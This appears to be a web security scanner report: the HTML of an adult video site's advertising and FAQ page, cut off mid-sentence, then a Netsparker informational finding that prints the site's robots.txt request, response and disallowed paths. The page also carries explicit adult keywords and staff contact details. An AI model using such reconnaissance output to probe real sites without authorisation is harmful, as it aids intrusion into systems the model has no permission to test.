<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Free Porn Videos &amp; Sex Movies - Porno, XXX, Porn Tube and Pussy Porn</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/information" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/information" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/information" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div class="section_wrapper" id="feedback">
<div class="tabmenu">
<ul>
<li class="advertising"><a href="/information#advertising" rel="nofollow" class="active">Advertising</a></li>
<li class="faq"><a href="/information#faq" rel="nofollow">FAQ</a></li>
<li class="terms"><a href="/information#terms" rel="nofollow">Terms and Conditions</a></li>
<li class="privacy"><a href="/information#privacy" rel="nofollow">Privacy Policy</a></li>
<li class="dmca"><a href="/information#dmca" rel="nofollow">DMCA</a></li>
<li class="btn-2257"><a href="/information#btn-2257" rel="nofollow">2257</a></li>
<li class="webmaster"><a href="/webmasters" rel="nofollow">Webmasters</a></li>
<li class="partner"><a href="/information#partner" rel="nofollow">Content Partner Program</a></li>
</ul>
<div style="clear:both;"></div>
</div>
<div class="section_bar faq-cont">
<div class="section_title_lc png"></div>
<h4 class="section_title">Having Video Problems?</h4>
<div class="section_title_rc png"></div>
<div class="videos_wrapper">
<p>
Many of our users who have recently updated their Flash have reported issues regarding video playback, either seeing a black square where the video
player should be OR seeing the video playing in double, with a green line splitting the player in half horizontally. The problem should be resolved
for most users by following a few quick steps <a href="/front/flash10bug">HERE</a>.
</p>
</div>
</div>
<div class="section_bar advertising-cont">
<div class="section_title_lc png"></div>
<h4 class="section_title">Pornhub Advertising</h4>
<div class="section_title_rc png"></div>

<div class="videos_wrapper">

<div class="right"><a href="http://www.trafficjunky.net" rel="nofollow"><img src="http://cdn1.static.pornhub.phncdn.com/images/traffic-junky-logo.gif"></a></div>
<p class="last">If you would like to book a spot on Pornhub, please visit <a href="http://www.trafficjunky.net" rel="nofollow">www.trafficjunky.net</a></p>
<p><strong>Email:</strong> diana [at] trafficjunky.net or karll [at] trafficjunky.net</p>
<p>
<strong>ICQ:</strong> 433156868 - Karll<br/>
<strong>ICQ:</strong> 489070668 - Diana<br/>
</p>

</div> </div>
<div class="section_bar faq-cont" style="display:none;">
<div class="section_title_lc png"></div>
<h4 class="section_title">Pornhub FAQ</h4>
<div class="section_title_rc png"></div>

<div class="videos_wrapper">

<br /><p><strong><font color="#4fb2dc">Ok, so what's this PornHub thing all about?</font></strong><br />
PornHub is a community of people who all have one thing in common, their love of great porn! On PornHub you can post your favorite videos, watch videos that other users have posted, meet other like-minded individuals and discuss what's great (or what you'd love to change) about porn from all eras.</p>

<p><strong><font color="#4fb2dc">Sounds great, but how much does it cost?</font></strong><br />
PornHub is completely free of charge! PornHub won't charge you anything to watch as many videos as you like, upload your own videos or participate in our community. As long as you're happy, PornHub is happy.</p>

<p><strong><font color="#4fb2dc">Help! The videos don't play at all! What do I do?</font></strong><br />
To make sure that we provide only the highest possible quality videos, you will need to download Flash 9.0 (or higher) to view videos. If you don't yet have Flash 9.0, you can download it <a href="http://get.adobe.com/de/flashplayer/" rel="nofollow" target="_blank">here</a>. If you already have Flash 9.0 and still can't watch the videos, please <a href="/support" rel="nofollow">send us an email</a> and we'll be happy to look into it for you!</p>

<p><strong><font color="#4fb2dc">How do I cancel my Premium Membership?</font></strong><br />
To cancel your Premium Membership please click <a href="http://movieboxsupport.com/?action=cancel" rel="nofollow">here</a> and follow the provided instructions.</p>

<p><strong><font color="#4fb2dc">I see that you have a members area. Why should I become a member of PornHub?</font></strong><br />
While anyone can watch the videos that the community is sharing on PornHub, only members receive the full spectrum of features that are available to the community. Upload videos, post comments, rate videos, and fully participate in the PornHub experience. You can even store your favorite videos on your very own member's page, browse other member's profiles, send them messages and see what other members are watching and talking about! Click <a href="/signup" rel="nofollow">here</a> to get started!</p>

<p><strong><font color="#4fb2dc">How much does it cost to become a member?</font></strong><br />
Nothing! Becoming a basic member of PornHub is absolutely free. All it requires is that you choose a unique name for yourself and provide a valid email address. Once you've signed up, you're ready to fully participate in the PornHub community. Upload your favorite videos, interact with other members, rate videos and start growing your reputation as a Porn King! You can start your membership experience by clicking <a href="/signup" rel="nofollow">here</a>.</p>

<p><strong><font color="#4fb2dc">How do I upload a video to PornHub?</font></strong><br />
Once you've become a member, simply choose "upload video" from the main page, or follow this <a href="/upload" rel="nofollow">link</a> to share your video with the community.</p>

<p><strong><font color="#4fb2dc">What are "tags"?</font></strong><br />
When uploading a video, we ask that you include at least a few tags that describe your video and that will make it easier for the commu..
Robots.txt Identified

Robots.txt Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.

Remedy

- /robots.txt

/robots.txt CONFIRMED

http://www.pornhub.com/robots.txt

Interesting Robots.txt Entries

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.pornhub.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:08:26 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 19:33:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 152
Content-Type: text/plain


User-agent: *
Sitemap: http://www.pornhub.com/sitemaps.xml
disallow: *embed_player*
disallow: *watch_player*
disallow: *video_related*
disallow: /users/
disallow: /photo/
disallow: /album/
disallow: *page*page*
disallow: *search*page*
disallow: *search*o=*